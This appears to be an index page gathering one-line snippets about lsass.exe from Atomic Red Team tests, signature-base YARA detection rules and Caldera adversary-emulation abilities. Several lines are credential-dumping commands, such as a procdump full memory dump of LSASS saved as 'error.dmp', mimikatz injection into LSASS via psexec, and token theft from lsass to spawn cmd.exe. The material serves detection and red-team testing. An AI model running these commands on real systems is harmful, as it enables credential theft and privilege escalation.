atomic-red-team T1036.003.md %SystemRoot%\Temp\lsass.exe /B MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1 MIT License. © 2018 Red Canary
atomic-red-team T1055.md - Atomic Test #2 - Remote Process Injection in LSASS via mimikatz MIT License. © 2018 Red Canary
atomic-red-team T1055.md ## Atomic Test #2 - Remote Process Injection in LSASS via mimikatz MIT License. © 2018 Red Canary
atomic-red-team T1055.md Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread). MIT License. © 2018 Red Canary
atomic-red-team T1134.002.md $PathToAtomicsFolder\T1134.002\src\GetToken.ps1; [MyProcess]::CreateProcessFromParent((Get-Process lsass).Id,”cmd.exe”) MIT License. © 2018 Red Canary
atomic-red-team T1134.004.md Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)</blockquote> MIT License. © 2018 Red Canary
atomic-red-team T1547.002.md After a reboot, Notepad.exe will be executed as child process of lsass.exe. MIT License. © 2018 Red Canary
signature-base apt_eqgrp.yar $s1 = “LSASS.EXE” fullword wide CC BY-NC 4.0
signature-base apt_hafnium.yar $s1 = “lsass.exe C:\windows\temp\lsass” ascii wide fullword CC BY-NC 4.0
signature-base apt_irontiger_trendmicro.yar $str2 = “Fail To Search LSASS Data” nocase wide ascii CC BY-NC 4.0
signature-base apt_passthehashtoolkit.yar $s7 = “Cannot get LSASS.EXE PID!” fullword ascii /* score: ‘14.00’ */ CC BY-NC 4.0
signature-base apt_passthehashtoolkit.yar $s5 = “Error: Cannot open LSASS.EXE!.” fullword ascii /* score: ‘12.00’ */ CC BY-NC 4.0
signature-base apt_passthehashtoolkit.yar $s7 = “LSASS HANDLE: %x” fullword ascii /* score: ‘5.00’ */ CC BY-NC 4.0
signature-base apt_passthehashtoolkit.yar $s6 = “Cannot get LSASS.EXE PID!” fullword ascii /* score: ‘14.00’ */ CC BY-NC 4.0
signature-base apt_rwmc_powershell_creddump.yar $s3 = “Copy-Item -Path "\\$computername\\c$\windows\temp\lsass.dmp" -Destination "$logDirectoryPath"” fullword ascii CC BY-NC 4.0
signature-base apt_skeletonkey.yar $target_process = “lsass.exe” wide CC BY-NC 4.0
signature-base apt_sphinx_moth.yar $s2 = “LSASS secure pipe” fullword ascii /* PEStudio Blacklist: strings */ CC BY-NC 4.0
signature-base generic_anomalies.yar description = “Detects uncommon file size of lsass.exe” CC BY-NC 4.0
signature-base generic_anomalies.yar and filename == “lsass.exe” CC BY-NC 4.0
signature-base generic_dumps.yar description = “Detects a LSASS memory dump file” CC BY-NC 4.0
signature-base generic_dumps.yar $s1 = “lsass.exe” ascii fullword CC BY-NC 4.0
signature-base gen_fireeye_redteam_tools.yar $lsass = { 6C 73 61 73 [6] 73 2E 65 78 [6] 65 } CC BY-NC 4.0
signature-base gen_powershell_suite.yar $ = “Calling Advapi32::OpenProcessToken –> LSASS” ascii CC BY-NC 4.0
signature-base gen_powershell_toolkit.yar $x4 = “Invoke-ReflectivePEInjection -PEBytes $PEBytes -ProcName lsass -ComputerName Target.Local” fullword ascii CC BY-NC 4.0
signature-base spy_equation_fiveeyes.yar $s1 = “lsasrv32.dll and lsass.exe” fullword wide CC BY-NC 4.0
signature-base spy_equation_fiveeyes.yar $s3 = “LSASS.EXE” fullword wide CC BY-NC 4.0
signature-base spy_regin_fiveeyes.yar $s0 = “\SYSTEMROOT\system32\lsass.exe” fullword wide CC BY-NC 4.0
signature-base thor-hacktools.yar $d = “Cannot get PID of LSASS.EXE” CC BY-NC 4.0
signature-base thor-hacktools.yar $f = “Couldn’t find LSASS pid” CC BY-NC 4.0
signature-base thor-hacktools.yar $s0 = “LSASS.EXE” fullword ascii CC BY-NC 4.0
signature-base thor-hacktools.yar $s2 = “LSASS.EXE” fullword wide CC BY-NC 4.0
signature-base thor-hacktools.yar $s2 = “Unable to open LSASS.EXE process” fullword ascii CC BY-NC 4.0
signature-base thor_inverse_matches.yar description = “Anomaly rule looking for certain strings in a system file (maybe false positive on certain systems) - file lsass.exe” CC BY-NC 4.0
signature-base thor_inverse_matches.yar filename == “lsass.exe” CC BY-NC 4.0
signature-base yara_mixed_ext_vars.yar description = “LSASS minidump file for mimikatz” CC BY-NC 4.0
signature-base yara_mixed_ext_vars.yar $lsass = “System32\lsass.exe” wide nocase CC BY-NC 4.0
signature-base yara_mixed_ext_vars.yar (uint32(0) == 0x504d444d) and $lsass and filesize > 50000KB and not filename matches /WER/ CC BY-NC 4.0
stockpile 0ef4cc7b-611c-4237-b20b-db36b6906554.yml name: Leverage Procdump for lsass memory Apache-2.0
stockpile 0ef4cc7b-611c-4237-b20b-db36b6906554.yml description: Dump lsass for later use with mimikatz Apache-2.0
stockpile 0ef4cc7b-611c-4237-b20b-db36b6906554.yml name: "OS Credential Dumping: LSASS Memory" Apache-2.0
stockpile 0ef4cc7b-611c-4237-b20b-db36b6906554.yml iex $staging_folder"\procdump64.exe -accepteula -ma lsass.exe" > $env:APPDATA\error.dmp 2>&1; Apache-2.0
stockpile 0ef4cc7b-611c-4237-b20b-db36b6906554.yml iex $staging_folder"\procdump.exe -accepteula -ma lsass.exe" > $env:APPDATA\error.dmp 2>&1; Apache-2.0
stockpile 7049e3ec-b822-4fdf-a4ac-18190f9b66d1.yml name: "OS Credential Dumping: LSASS Memory" Apache-2.0
stockpile baac2c6d-4652-4b7e-ab0a-f1bf246edd12.yml name: "OS Credential Dumping: LSASS Memory" Apache-2.0
stockpile 0bff4ee7-42a4-4bde-b09a-9d79d8b9edd7.yml name: Find LSASS Apache-2.0
stockpile 0bff4ee7-42a4-4bde-b09a-9d79d8b9edd7.yml description: Get process info for LSASS Apache-2.0
stockpile 0bff4ee7-42a4-4bde-b09a-9d79d8b9edd7.yml $valid = foreach($p in $ps) { if($p.ProcessName -eq "lsass") {$p} }; Apache-2.0
stockpile 0bff4ee7-42a4-4bde-b09a-9d79d8b9edd7.yml Process[] allProc = Process.GetProcessesByName("lsass"); Apache-2.0

MIT License. Copyright (c) 2020-2021 Strontic.